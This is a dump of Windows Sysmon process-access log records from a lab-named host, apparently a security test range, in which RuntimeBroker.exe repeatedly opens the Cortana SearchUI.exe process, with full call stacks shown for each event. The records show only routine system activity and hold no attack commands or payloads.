13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x800000000000000012342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 